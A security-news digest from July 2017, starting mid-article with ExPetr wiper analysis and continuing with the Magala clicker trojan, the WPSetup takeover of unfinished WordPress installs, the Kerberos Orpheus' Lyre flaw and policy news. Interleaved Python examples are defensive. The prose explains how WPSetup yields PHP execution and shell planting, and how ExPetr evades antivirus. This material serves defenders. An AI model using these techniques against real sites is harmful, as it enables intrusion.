WipePhysicalDrive: This routine overwrites the first 10 sectors of the disk with random trash.
Let’s describe this condition in detail:
The WipePhysicalDrive function is initiated if either of the following holds:
the special bit in the runtime config is not set (this happens when the malware finds the avp.exe process running), or
the InfectMbr function fails.
This is what happens after an initial infection:

Graphic illustration of condition

Very important additions:
WipePhysicalDrive can be initiated regardless of whether the avp.exe process is running. It is called whenever the malware fails to write the malicious code to the MBR, for example because another security solution blocked the write.
Regardless of whether the MBR was infected with malicious code or overwritten with random trash, the malware still tries to encrypt the victim’s files using the AES and RSA ciphers and the attacker’s public key.
Overall, it appears that the group behind ExPetr have built what is usually called a stone soup. This is a mix of old code, new code, dirty hacks, test checks and parts of unusual code. For instance, there is a special condition block in which the AES file encryption doesn’t run at all, however, this condition is always false. It very much looks like something that was rushed out the door before it was polished and ready, from many points of view.

Why the rush, you may wonder? We do not know, but there could be several explanations. One of them could be they tried really hard to catch the EternalBlue/EternalRomance “train”. After WannaCry, a lot of organizations started patching their Windows installations to close these vulnerabilities, effectively shrinking the window of opportunity. It’s possible the authors of ExPetr wanted to infect as many targets as possible before these exploits were widely patched.

Despite the rush, the attackers were obviously aware of our technologies (and other companies’ technologies), notably System Watcher, which is extremely effective at fighting ransomware. System Watcher collects information about the suspicious actions of running programs and builds a score from them. For instance, when a program reads a whole file into memory, then writes another file of similar size but different format, then deletes the original, the score increases. Other known bad behaviour raises the score and good behaviour lowers it. If malicious actions repeat over and over, the score can reach a threshold at which it is fairly obvious that something is wrong. In that case, System Watcher warns the user and offers to terminate the offending process and restore the data.
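The kind of behavioural scoring the paragraph describes can be shown on a replayed stream of file events. The following Python is an added example written for this page, not Kaspersky’s System Watcher implementation; the weights, the threshold and the event stream are all assumed or constructed, and a real watcher would use many more behaviours than the read/write/delete pattern modelled here.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class FileEvent:
    pid: int
    action: str   # "read", "write" or "delete"
    path: str
    size: int     # bytes read or written (0 for delete)


# Assumed weights and threshold for this illustration; not values from any real product.
W_WRITE_DIFFERENT_FORMAT = 2   # wrote a file of similar size but different extension after reading one
W_DELETE_ORIGINAL = 3          # then deleted the original it had read
W_REWRITE_SAME_FILE = -1       # rewrote a file in place, as an ordinary editor does
THRESHOLD = 8


def _ext(path: str) -> str:
    name = path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def _similar_size(a: int, b: int) -> bool:
    # within 10 % of the original size (or 64 bytes for tiny files)
    return abs(a - b) <= max(64, a // 10)


def score_processes(events: List[FileEvent], threshold: int = THRESHOLD) -> Tuple[Dict[int, int], List[int]]:
    """Replay file events and score each process. Returns (scores, flagged): scores
    maps pid -> final score, flagged lists the pids that reached the threshold in
    the order they did so (the point at which a watcher would intervene)."""
    reads: Dict[int, Dict[str, int]] = defaultdict(dict)    # pid -> {path read: size}
    derived: Dict[int, Dict[str, str]] = defaultdict(dict)  # pid -> {original: new file}
    scores: Dict[int, int] = defaultdict(int)
    flagged: List[int] = []
    for ev in events:
        if ev.action == "read":
            reads[ev.pid][ev.path] = ev.size
        elif ev.action == "write":
            if ev.path in reads[ev.pid]:
                scores[ev.pid] += W_REWRITE_SAME_FILE
            else:
                # Did this process just read a file of about this size in another format?
                for orig, size in reads[ev.pid].items():
                    if (orig not in derived[ev.pid]
                            and _ext(orig) != _ext(ev.path)
                            and _similar_size(size, ev.size)):
                        derived[ev.pid][orig] = ev.path
                        scores[ev.pid] += W_WRITE_DIFFERENT_FORMAT
                        break
        elif ev.action == "delete":
            if ev.path in derived[ev.pid]:
                scores[ev.pid] += W_DELETE_ORIGINAL
        if scores[ev.pid] >= threshold and ev.pid not in flagged:
            flagged.append(ev.pid)
    return dict(scores), flagged


# Constructed sample stream: pid 4242 behaves like a file encryptor, pid 1000 like an editor.
SAMPLE_EVENTS = [
    FileEvent(4242, "read",   "/home/u/docs/a.docx",        20000),
    FileEvent(4242, "write",  "/home/u/docs/a.docx.locked", 20016),
    FileEvent(4242, "delete", "/home/u/docs/a.docx",            0),
    FileEvent(4242, "read",   "/home/u/docs/b.xlsx",         8000),
    FileEvent(4242, "write",  "/home/u/docs/b.xlsx.locked",  8016),
    FileEvent(4242, "delete", "/home/u/docs/b.xlsx",            0),
    FileEvent(1000, "read",   "/home/u/notes.txt",            500),
    FileEvent(1000, "write",  "/home/u/notes.txt",            520),
    FileEvent(1000, "read",   "/home/u/report.docx",         3000),
    FileEvent(1000, "write",  "/home/u/report.pdf",          3100),
]

if __name__ == "__main__":
    scores, flagged = score_processes(SAMPLE_EVENTS)
    print("scores:", scores)            # {4242: 10, 1000: 1}
    print("would terminate:", flagged)  # [4242]
```

The editor process exports a document to a different format (a legitimate action that also raises the score) but never deletes the original, so it stays well under the threshold; the encryptor crosses it on its second file, which is the point at which the watcher would stop it and roll the changes back.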

To fight against this technology, the ExPetr authors have included multiple “countermeasures.” One of them is to avoid writing the GoldenEye encryptor code to the MBR if our product is running. This is done in order to prevent raising the suspicion score and getting terminated too early. It actually seems that they put significant energy into trying to bypass our products and target our users, meaning they were pretty worried about being stopped. Nevertheless, these didn’t work too well, reinforcing the theory of a big pile of hacks put together in a rush. The System Watcher component fires anyway and stops the file encryption, terminating the process and undoing the changes.

To conclude, our users have been protected despite the measures built into ExPetr to target them.

So why are we writing this longer explanation? With complex malware code and countermeasures built to bypass antivirus products, it is hard to understand all the functionality of today’s malware. It is easy to be tricked into believing that certain code checks give Kaspersky users a free pass. In reality, they were intended as a means of trying to slip under System Watcher’s radar. In the end, it didn’t work. Our users do not need a free pass from ExPetr, since they have a universal “free pass” from our products and System Watcher.


The Magala Trojan Clicker: A Hidden Advertising Threat
14.7.2017 Kaspersky
Virus
One large group will slowly conquer another large group, reduce its numbers, and thus lessen its chance of further variation and improvement. <…> Small and broken groups and sub-groups will finally tend to disappear.
Charles Darwin. ‘On the Origin of Species’
The golden age of Trojans and viruses has long gone. Malicious programs created by enthusiasts for research purposes and for fun are now largely confined to history books and dusty computer incident reports. They have been replaced by programs that put a heavy emphasis on making money.

If we ignore targeted attacks prepared by professionals for very specific purposes, what sort of malware do we most often hear about today? Encryption malware and DDoS botnets made up of IoT devices. Both types are profitable for cybercriminals and relatively easy to implement. However, they are not the only types of malware capable of generating cash; we mustn’t overlook a third particularly numerous borderline malware family that includes advertising bots and modules, and partnership programs – all of which is typically referred to as potentially unwanted adware/potentially unwanted programs (PUA/PUP). They are borderline because there is a fine line between classifying a program as adware and defining the same program as an outright Trojan. In this paper, we will deal with one such renegade that has gone well beyond the limits of ‘fair play’ when it comes to advertising.

The malware in question is detected by Kaspersky Lab products as Trojan-Clicker.Win32.Magala.

Operating algorithm
Magala falls into the category of Trojan Clickers that imitate a user click on a particular webpage, thus boosting advertisement click counts. It’s worth pointing out that Magala doesn’t actually affect the user, other than consuming some of the infected computer’s resources. The main victims are those paying for the advertising; typically they are small business owners doing business with unscrupulous advertisers.

The first stage of infection involves the Trojan checking which version of Internet Explorer is installed and locating it in the system. If it’s version 8 or earlier, the Trojan won’t run. So, if you still have this version on your computer, there’s nothing to worry about.

Checking the version of Internet Explorer, virtual desktop initialization.
If the desired version of Internet Explorer is found, then, unbeknown to the user, a virtual desktop is initialized. All further activities are performed there. After that, a sequence of utility operations is run (typical for this malware family): autorun is set up, a report is sent to a hardcoded URL, and the required adware is installed. To interact with the content of an open page, Magala uses IHTMLDocument2, the standard Windows interface that makes it easy to work with the DOM tree. The Trojan uses it to load the MapsGalaxy Toolbar, installs it on the system and adds the site hxxp://hp.myway.com, also associated with MapsGalaxy, to the system registry so that it becomes the browser’s home page.

A simple check is incorporated into the Trojan to find out if the search bar has already been installed – this is done with the help of the appropriate registry branch.

Magala then contacts the remote server and requests a list of search queries for the click counts that need to be boosted.

Receiving the list of search queries
This list is sent ‘as is’, in a plain text file with many lines.

List of search queries
Using this list, the program begins to send the requested search queries and click on each of the first 10 links in the search results, with an interval of 10 seconds between each click.

The program starts entering the specified queries one after another and clicking on the first ten links
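The click pattern just described (a search request followed by visits to the first ten results at a fixed ten-second interval) is unlike anything a person produces, so it can be looked for in web proxy logs. The following Python is an added example, not Kaspersky’s code: the log format, the search-engine host list and the cadence thresholds are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import pstdev
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Constructed proxy log in a hypothetical "ISO-time client-ip URL" format.
SAMPLE_LOG = """\
2017-06-01T10:00:00 10.0.0.5 http://search.example/search?q=cheap+car+insurance
2017-06-01T10:00:10 10.0.0.5 http://result-01.example/landing
2017-06-01T10:00:20 10.0.0.5 http://result-02.example/landing
2017-06-01T10:00:30 10.0.0.5 http://result-03.example/landing
2017-06-01T10:00:40 10.0.0.5 http://result-04.example/landing
2017-06-01T10:00:50 10.0.0.5 http://result-05.example/landing
2017-06-01T10:01:00 10.0.0.5 http://result-06.example/landing
2017-06-01T10:01:10 10.0.0.5 http://result-07.example/landing
2017-06-01T10:01:20 10.0.0.5 http://result-08.example/landing
2017-06-01T10:01:30 10.0.0.5 http://result-09.example/landing
2017-06-01T10:01:40 10.0.0.5 http://result-10.example/landing
2017-06-01T10:05:00 10.0.0.9 http://search.example/search?q=weather+berlin
2017-06-01T10:05:07 10.0.0.9 http://weather-a.example/
2017-06-01T10:05:31 10.0.0.9 http://weather-b.example/forecast
2017-06-01T10:06:20 10.0.0.9 http://weather-a.example/radar
"""

SEARCH_HOSTS = {"search.example"}   # assumed; list the real engines in a deployment
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+)$")


def parse_log(text: str) -> List[Tuple[datetime, str, str]]:
    """Parse the constructed format into (timestamp, client, url) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)))
    return events


def _is_search(url: str) -> bool:
    parts = urlsplit(url)
    return parts.hostname in SEARCH_HOSTS and parts.query.startswith("q=")


def find_clicker_candidates(events, min_clicks=8, window_s=150,
                            cadence_s=10.0, tolerance_s=1.5) -> Dict[str, dict]:
    """Flag clients that, after a search request, visit at least min_clicks distinct
    hosts inside window_s seconds with a nearly constant gap of about cadence_s."""
    by_client = defaultdict(list)
    for ts, ip, url in events:
        by_client[ip].append((ts, url))
    flagged = {}
    for ip, evs in by_client.items():
        evs.sort()
        for i, (ts, url) in enumerate(evs):
            if not _is_search(url):
                continue
            follow = [(t, u) for t, u in evs[i + 1:]
                      if (t - ts).total_seconds() <= window_s and not _is_search(u)]
            if len(follow) < min_clicks:
                continue
            hosts = {urlsplit(u).hostname for _, u in follow}
            gaps = [(follow[k][0] - follow[k - 1][0]).total_seconds()
                    for k in range(1, len(follow))]
            mean_gap = sum(gaps) / len(gaps)
            # Machine-like: many distinct hosts, mean gap near the cadence, almost no jitter.
            if (len(hosts) >= min_clicks and abs(mean_gap - cadence_s) <= tolerance_s
                    and pstdev(gaps) <= tolerance_s):
                flagged[ip] = {"query": url, "clicks": len(follow), "mean_gap": mean_gap}
                break
    return flagged


if __name__ == "__main__":
    for ip, info in find_clicker_candidates(parse_log(SAMPLE_LOG)).items():
        print(ip, info)   # 10.0.0.5 {'query': ..., 'clicks': 10, 'mean_gap': 10.0}
```

The human client (10.0.0.9) opens three results at irregular intervals and is ignored; the bot-like client is reported with the query it was boosting, which is the lead a responder would take to the infected host.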

Profit margin
As far as we know, the average cost per click (CPC) in a campaign like this is 0.07 USD. The cost per thousand (CPM) comes to 2.2 USD. It should be noted that Trojan Clickers are certainly not the most popular way of selling advertising: the method most in demand is displaying a set homepage, where each installation also costs 0.07 USD.

A botnet of 1,000 infected computers, each clicking 10 website addresses from every search result and performing some 500 search requests with no overlap in the search results, could ideally earn the virus writer up to 350 USD per infected computer. However, these estimates are idealized and rarely hold in the real world: the cost of different requests may vary greatly, and 0.07 USD per click is itself only an average.

Propagation statistics
As can be seen in the diagram below, Trojan-Clicker.Win32.Magala infections occur most often in Germany and the US. This finding is corroborated by an analysis of the search requests for which the click numbers need to be boosted. These statistics were collected from March to early June 2017.

Conclusion
Programs belonging to the potentially unwanted adware class do not typically pose as much of a threat to the end user as, say, encryption or banking malware does. However, there are two characteristic features to this malware class which make it difficult to deal with. Firstly, there is the borderline functionality that blurs the lines between legitimate and malicious software. It has to be clarified whether a specific program is part of a secure and legal advertising campaign or if it is illegitimate software performing similar functions. A second important aspect of this class – its sheer quantity – also means a fundamentally different approach to any analysis is required.

MD5
1EB2D932BB916D4DB7F483859EEBABF8
206DD0B0E8FAA2D81AB617491F80AD0B
25BC675D23C2ACD5F288856F6B91818D
44A408386B983583CAEB0590433BE07B
4E4FA0B8C73889E9AA028C8FD7D7B3A5
6D3D80E89ABDED981AE329203F1779EB
6FA035264744E9C9A30409012BAB18DE
732B82A7424B60FEBB1E874B205E2D76
771E742D6C110F8BD68A7304EF93B131
A6B288A3B8C48A23092246FBBF6DB7C2
CF5A5C45778C793477ECAB02F1B3B2C3
DC16BA21BFE4838FD2A897FF13050FF4
F364B043BD6E2CC9C43F86E2004D71D3
F36672933F3CBACF8D8B396DFE259526


New "WPSetup" Attack Targets Fresh WordPress Installs

14.7.2017 securityweek Attack

A new type of attack against WordPress is targeting fresh installations to get admin access and execute PHP code in the victim’s web hosting account, Wordfence reveals.

Dubbed WPSetup, the campaign was observed in May and June, and starts with the attackers scanning for a specific URL used by new installations of WordPress: /wp-admin/setup-config.php. If that URL serves the setup page, the victim has recently installed WordPress on their server but has yet to configure it.

Basically, it means that those who install WordPress either by unzipping the ZIP archive or through a one-click installer but don’t immediately complete the installation steps provide attackers with the necessary means to take control of the website.

“It is very easy for an attacker to take over not just the new WordPress website, but the entire hosting account and all other websites on that hosting account,” Mark Maunder, Wordfence founder and CEO, claims.

Any WordPress installation starts with selecting the language, followed by an introductory message, after which the user selects a database name, username, password and server for the new WordPress installation. At this point, an attacker who finds the fresh install can “click through the first two steps and then enter their own database server information,” Maunder argues.

The attack works even if the database is on the attacker’s own server or contains no data, Wordfence says. A working WordPress installation on the victim’s site, with admin access to it, is all the attackers need. Once the final installation step is completed, WordPress confirms that it can communicate with the database and presents the attacker with a dialogue to run the install.

At this point, the attacker can create the first admin-level account with their own information, hit install, and then sign into a fresh WordPress on the victim’s server, using their own database.

“Once an attacker has admin access to a WordPress website running on your hosting account, they can execute any PHP code they want in your hosting account,” Maunder notes.

Because WordPress allows admins to edit the code of themes and plugins, an attacker can simply launch the theme or plugin editor and insert PHP code, thus having the code executed the next time the page is refreshed.

“Once an attacker has admin access to a WordPress site, they can upload any plugin with any PHP code, including their own custom plugin. To execute their code, they spend a few minutes creating a basic WordPress plugin and then upload it to the site and activate it,” Maunder continues.

An attacker could execute code on the victim’s site and also install a malicious shell in a directory in the victim’s hosting account, thus gaining access to all files and websites on that account. This would also provide the attacker with access to any databases the WordPress installation has access to, and maybe also with access to other application data.

Logan Kipp, Product Evangelist at SiteLock, told SecurityWeek in an emailed comment that incomplete WordPress setups left online and publicly-accessible are more common than one might think. According to Kipp, even when warned of the risks involved, many customers wouldn’t understand that “reinstalling WordPress would not inhibit a persistent infection, especially if it spread outside of the WordPress file structure.”

“Cybercriminals aren't always after just sensitive information like passwords and credit cards; a server's resources are one of the many currencies of the cybercriminal underworld. Your server may be used to leverage attacks on other servers or website visitors. One of the questions I am frequently asked is "who hosts a cybercriminal?" In most cases, the answer is regular people who aren't well-informed that have become unwilling cohabitants to a cybercriminal,” he continues.

Weston Henry, Lead Security Analyst at SiteLock, told SecurityWeek that the attack itself is a well-known tactic and that web scanners have long been configured to find default install files and directories.

“The WordPress attackers capitalized on the sheer number of WordPress installs on the net, and took advantage of forgotten and unfinished installs. Site owners can protect themselves by preparing for and completing new WordPress installs as soon as they're begun. Next, site owners can use a web application firewall to whitelist owner or developer IP addresses. An .htaccess file can also be used to limit access by IP address,” Henry said.
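The forgotten installs Henry describes are easy to find on one’s own hosting account before a scanner does. The following Python is an added example written for this page, not Wordfence’s or SiteLock’s code: it walks a web root for trees that still expose wp-admin/setup-config.php without a wp-config.php, honouring the fact that WordPress also accepts wp-config.php one directory above the install. The directory layout is constructed and the file contents are placeholders.

```python
import tempfile
from pathlib import Path
from typing import List


def find_unfinished_wordpress_installs(webroot: str) -> List[str]:
    """Return site directories (relative to webroot) that still expose
    wp-admin/setup-config.php but have no wp-config.php in the site root or,
    as WordPress also allows, one directory above it."""
    root = Path(webroot)
    unfinished = []
    for setup in sorted(root.rglob("wp-admin/setup-config.php")):
        site = setup.parent.parent
        configured = ((site / "wp-config.php").exists()
                      or (site.parent / "wp-config.php").exists())
        if not configured:
            unfinished.append(str(site.relative_to(root)))
    return unfinished


def build_sample_webroot() -> str:
    """Construct a throwaway hosting directory: 'blog' is configured, 'shop' was
    unzipped and never set up. Constructed sample; file contents are placeholders."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    for site, configured in (("blog", True), ("shop", False)):
        (root / site / "wp-admin").mkdir(parents=True)
        (root / site / "wp-admin" / "setup-config.php").write_text("<?php // placeholder\n")
        if configured:
            (root / site / "wp-config.php").write_text("<?php // placeholder\n")
    return str(root)


if __name__ == "__main__":
    sample = build_sample_webroot()
    print(find_unfinished_wordpress_installs(sample))   # ['shop']
```

Run it against the real document root (for example `find_unfinished_wordpress_installs("/var/www")`) as a cron job; any hit should either be finished immediately or removed, and until then the setup URL should be restricted by IP as Henry suggests.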

In a separate report, Wordfence revealed that the number of daily complex attacks against WordPress has increased to 7.2 million in June, up 32% from May. The average number of daily brute force attacks went up 36% compared to May, with a peak at over 41 million.

The report also reveals that the top 25 attacking IPs launched a total of 133 million attacks in June, a slight decrease from the 144 million attacks registered in May. The most attacked WordPress theme was mTheme-Unus, while the most targeted plugin was WP Mobile Detector. The top three attacking countries are Russia, U.S. and Ukraine, the report also reveals.


Old Kerberos Bypass Flaw Patched in Windows, Linux

14.7.2017 securityweek Vulnerability

A 20-year-old authentication bypass vulnerability affecting some implementations of the Kerberos protocol has been patched in Windows, Linux and BSD operating systems.

Kerberos, whose name stems from the mythological three-headed hound Cerberus, is an authentication protocol that uses “tickets” to allow nodes to communicate securely over a non-secure network.

The flaw has been dubbed Orpheus' Lyre because similar to how the bard Orpheus managed to get past Cerberus by putting it to sleep with his lyre, the vulnerability can be used to bypass Kerberos.

Researchers Jeffrey Altman, Viktor Duchovni and Nico Williams first discovered the security hole in the Heimdal implementation of Kerberos, which had been vulnerable since late 1996. Microsoft’s implementation also turned out to be affected, but MIT Kerberos was never impacted.

Orpheus' Lyre vulnerability

The experts have not provided too many technical details in order to give users time to apply the patches. However, they did reveal that the flaw affects the Kerberos v5 specification and it’s related to the use of unauthenticated plaintext.

A man-in-the-middle (MitM) attacker can exploit the vulnerability to steal credentials, escalate privileges, and bypass authentication.

“In _krb5_extract_ticket() the KDC-REP service name must be obtained from encrypted version stored in 'enc_part' instead of the unencrypted version stored in 'ticket'. Use of the unencrypted version provides an opportunity for successful server impersonation and other attacks,” said the developers of Heimdal, who track the flaw as CVE-2017-11103.
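The Heimdal description can be shown on a reduced model of the KDC-REP. The following Python is an added example written for this page, not Heimdal’s, MIT’s or Microsoft’s code: the message is cut down to the two fields that matter, the “encryption” is a stand-in keystream-plus-HMAC construction rather than a Kerberos etype, and every key and name is constructed. The point it demonstrates is the one in the quote: a client that reads the service name from the cleartext `ticket` trusts a field nobody authenticated to it, while the name inside `enc_part` is covered by the client’s own key.

```python
import hashlib
import hmac
import json
from typing import Any, Dict


def _keystream(key: bytes, n: int) -> bytes:
    out, counter = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def toy_encrypt(key: bytes, plaintext: bytes) -> Dict[str, str]:
    """Toy authenticated encryption (SHA-256 keystream XOR plus HMAC tag). It stands in
    for a Kerberos encryption type; it is not a real cipher and must not be reused."""
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, len(plaintext))))
    return {"cipher": ct.hex(), "tag": hmac.new(key, ct, hashlib.sha256).hexdigest()}


def toy_decrypt(key: bytes, blob: Dict[str, str]) -> bytes:
    ct = bytes.fromhex(blob["cipher"])
    if not hmac.compare_digest(hmac.new(key, ct, hashlib.sha256).hexdigest(), blob["tag"]):
        raise ValueError("enc_part integrity check failed")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, len(ct))))


def kdc_build_rep(client_key: bytes, sname: str, session_key_hex: str) -> Dict[str, Any]:
    """Simplified KDC-REP. The Ticket names the service in the clear (its own enc-part,
    sealed with the service key, is not modelled); enc_part, sealed with the client's
    key, repeats the service name alongside the session key."""
    enc_kdc_rep_part = json.dumps({"sname": sname, "key": session_key_hex}).encode()
    return {
        "ticket": {"sname": sname, "enc_part": "<sealed with the service key; not modelled>"},
        "enc_part": toy_encrypt(client_key, enc_kdc_rep_part),
    }


def extract_ticket_vulnerable(rep: Dict[str, Any], client_key: bytes) -> str:
    """Pre-fix logic: enc_part is decrypted (so the key is right) but the service
    name is read from the unauthenticated plaintext Ticket."""
    toy_decrypt(client_key, rep["enc_part"])
    return rep["ticket"]["sname"]


def extract_ticket_fixed(rep: Dict[str, Any], client_key: bytes) -> str:
    """Post-fix logic: the service name comes only from the authenticated enc_part."""
    return json.loads(toy_decrypt(client_key, rep["enc_part"]))["sname"]


def rewrite_cleartext_sname(rep: Dict[str, Any], new_sname: str) -> Dict[str, Any]:
    """Model an on-path change to the one field that is not protected by the client
    key. The sealed enc_part is left exactly as the KDC produced it."""
    copy = json.loads(json.dumps(rep))
    copy["ticket"]["sname"] = new_sname
    return copy


def enc_part_tamper_detected(rep: Dict[str, Any], client_key: bytes) -> bool:
    """Flip one byte of enc_part and confirm the client refuses it."""
    copy = json.loads(json.dumps(rep))
    ct = bytearray(bytes.fromhex(copy["enc_part"]["cipher"]))
    ct[0] ^= 0x01
    copy["enc_part"]["cipher"] = bytes(ct).hex()
    try:
        toy_decrypt(client_key, copy["enc_part"])
    except ValueError:
        return True
    return False


def demo() -> Dict[str, Any]:
    key = b"client-long-term-key (constructed)"
    rep = kdc_build_rep(key, "host/fileserver.example.net", "00" * 16)
    altered = rewrite_cleartext_sname(rep, "host/other.example.net")
    return {
        "vulnerable_sees": extract_ticket_vulnerable(altered, key),
        "fixed_sees": extract_ticket_fixed(altered, key),
        "enc_part_tamper_detected": enc_part_tamper_detected(rep, key),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable extractor happily reports the rewritten name even though every cryptographic check passed, because no check ever covered that field; the fixed extractor ignores the cleartext copy entirely, and any change to `enc_part` fails the integrity check. This is also why the bug is client-side only: the KDC sent a correct reply, and only the consumer’s choice of which copy to trust decides the outcome.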

Heimdal is used by several Linux distributions, which have already started releasing patches. Red Hat is not affected as it uses the MIT implementation of Kerberos.

The vulnerability has also been addressed in Samba, which has included Heimdal Kerberos since version 4.0.0. FreeBSD has also published an advisory.

Microsoft, which tracks the flaw as CVE-2017-8495, addressed it in Windows with its latest Patch Tuesday updates.

“A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. An attacker who successfully exploited this vulnerability could use it to bypass Extended Protection for Authentication.

To exploit this vulnerability, an attacker would have to be able to launch a man-in-the-middle attack against the traffic passing between a client and the server,” Microsoft said in its advisory.

The experts who discovered Orpheus' Lyre pointed out that this is a client-side bug that cannot be mitigated on the server side.

While the researchers, Samba and Heimdal have classified this as a critical vulnerability, Microsoft and some of the affected Linux distributions assigned it an “important” or “medium” severity rating, likely due to the fact that the attacker requires network access for exploitation.


Australia to Compel Chat Apps to Hand Over Encrypted Messages

14.7.2017 securityweek Social

Social media giants like Facebook and WhatsApp will be compelled to share encrypted messages of suspected terrorists and other criminals with Australian police under new laws unveiled Friday.

It comes after Prime Minister Malcolm Turnbull warned encrypted messages were increasingly being used by terrorists, drug traffickers and paedophile rings, calling for legislation to be modernised to allow police to do their jobs.

"We need to ensure that the internet is not used as a dark place for bad people to hide their criminal activities from the law," he said, adding that the tech giants must "face up to their responsibility".

"They can't just wash their hands of it and say it's got nothing to do with them."

Australian authorities can currently obtain information from telecommunications companies, but not internet firms that use data encryption to guarantee user confidentiality.

Encryption essentially involves complex algorithms scrambling data to make it indecipherable until unlocked by its owner or when it reaches its destination.

"Because of this end-to-end encryption, all of that information, all of that data, that communication is effectively dark to the reach of the law," said Turnbull.

"And that's not acceptable. We are a society, a democracy, under the rule of law, and the law must prevail online as well as offline."

The laws will be introduced into parliament by the end of the year.

Attorney-General George Brandis said the legislation would be similar to Britain's Investigatory Powers Act, which imposes an obligation on companies to cooperate with investigations.

They would provide Australian intelligence and law enforcement authorities with coercive powers as a "last resort" if tech companies did not voluntarily help, said Brandis.

"It is vitally important that the development of technology does not leave the law behind," he said.

However, Silicon Valley tech companies have so far refused to bend to similar legal requests.

Facebook said it already had a system in place to help police and intelligence officials in Australia.

"We appreciate the important work law enforcement does, and we understand their need to carry out investigations. That's why we already have a protocol in place to respond to requests where we can," a spokesperson said.

"At the same time, weakening encrypted systems for them would mean weakening it for everyone."

Apple told AFP it had no comment on the new legislation.

British Home Secretary Amber Rudd will travel to the United States shortly to discuss the issue further with her American counterpart and tech companies, said Turnbull.

The US government last year locked horns in a legal battle with Apple, seeking to compel the iPhone maker to help decrypt a device used by one of the attackers in the San Bernardino shooting rampage.

Authorities eventually dropped the case after finding a way to break into the iPhone without Apple's help.

Turnbull admitted it may be difficult to enforce the laws if firms do not comply, but said it was important to "recognise the challenge and call on those companies to provide the assistance".


Inadequate Boundary Protections Common in Critical Infrastructure: ICS-CERT

14.7.2017 securityweek ICS

The assessments conducted by the U.S. Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) in 2016 showed that inadequate boundary protection has remained the most prevalent weakness in critical infrastructure organizations.

ICS-CERT conducted 130 assessments in the fiscal year 2016, which is more than in any previous year. Monitor newsletters published by ICS-CERT this year show that it has already conducted 74 assessments in the first half of 2017.

Assessments are offered to both government organizations and private sector companies whose owners and operators request them. Last year, the CERT conducted assessments in 12 of the 16 critical infrastructure sectors, including chemical, commercial facilities, communications, critical manufacturing, emergency services, dams, energy, food and agriculture, IT, government facilities, transportation, and water and wastewater systems.

Similar to the previous two years, inadequate boundary protection remained the most common flaw – 94 discoveries representing more than 13 percent of all weaknesses identified during assessments. Boundary protection issues can result in failure to detect unauthorized activity in critical systems, and an increased risk to control systems due to the lack of proper separation from the enterprise network.

The second most prevalent type of vulnerability, with 42 discoveries, is “least functionality.” This refers to organizations failing to implement controls to ensure that unnecessary services, ports, protocols or applications that can be exploited to gain access to ICS are disabled.

ICS-CERT also discovered 36 instances of identification and authentication flaws. Many organizations fail to implement proper identification and authentication mechanisms for their users – this leads to accountability problems and makes it more difficult to secure the accounts of individuals who have left the company.

The fourth most prevalent issue discovered during assessments relates to physical access controls, weaknesses in which can make it easier for malicious actors to gain an initial foothold in the targeted organization’s ICS network.

Another common problem identified by investigators was related to mechanisms for auditing and accountability. According to ICS-CERT, 26 organizations did not have a formal process in place for reviewing and validating logs, which makes it more difficult to detect an intrusion in the ICS network and respond to an incident.

ICS-CERT’s FY 2016 Annual Assessment Report also includes recommendations on how to address these issues.


20-year-old Orpheus’ Lyre vulnerability in Kerberos fixed this week
14.7.2017 securityaffairs
Vulnerebility

A 20-year-old vulnerability in Kerberos, dubbed Orpheus’ Lyre, was patched this week for both Windows and Linux distributions.

The vulnerability dubbed Orpheus’ Lyre was found three months ago by Jeffrey Altman, founder of AuriStor, and by Viktor Dukhovni and Nicolas Williams of Two Sigma Investments.

The issue, tracked as CVE-2017-11103, was found in Heimdal, an open-source implementation of Kerberos. The name refers to the mythological Orpheus, who played his lyre with such grace that it lulled Cerberus to sleep; in the same way, this bug lets an attacker slip past Kerberos.

The issue can lead to remote privilege escalation and credential theft; an attacker already positioned on the target network can exploit it to gain further access.

“The original cryptographic sin of Kerberos is an abundance of unauthenticated plaintext in the protocol. That is, portions of Kerberos messages are neither encrypted nor integrity-protected in some direct cryptographic manner. In some cases that sin is likely born of premature optimization — the mother of many bugs. Kerberos can be secure despite this surfeit of unauthenticated plaintext, but it requires extreme care by implementors to get every detail right so as to authenticate said plaintext,” reads the description of Orpheus’ Lyre. “Orpheus’ Lyre happened because of one instance of unauthenticated plaintext, and the ease with which the specific plaintext could accidentally be used instead of an authenticated copy of the same text. The unauthenticated plaintext issue at hand is this: the Ticket issued in KDC responses.”

The flaw lies in the way Kerberos clients handle authentication messages: the researchers found that affected implementations took metadata from the unauthenticated Ticket carried in the key distribution center (KDC) response instead of from the encrypted part of that response, which is the only copy the client can actually verify.

“The attacker needs to be on the network and to have control over a service principal that the client could communicate with,” Altman told The Register. “As far as we know there are no exploits in the wild. But it certainly is exploitable and we consider it to be very serious.”

“Given how broadly Kerberos has been deployed over the last almost 30 years, it clearly is in a wide ecosystem with a lot of different vendors,” Altman added.

The Orpheus’ Lyre bug affects multiple Kerberos 5 implementations, including Microsoft’s and Heimdal, which is maintained by the KTH Royal Institute of Technology in Sweden.


Altman recommends reviewing every Kerberos implementation in use: not every vendor can be expected to have fixed the vulnerability, and in some cases the vendor has since gone out of business.

Altman explained that the flaw could have been prevented at the protocol level by removing the unencrypted fields, which would have forced implementations to use the encrypted ones.

“In _krb5_extract_ticket() the KDC-REP service name must be obtained from the encrypted version stored in ‘enc_part’ instead of the unencrypted version stored in ‘ticket’. Use of the unencrypted version provides an opportunity for successful server impersonation and other attacks,” wrote Altman.
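
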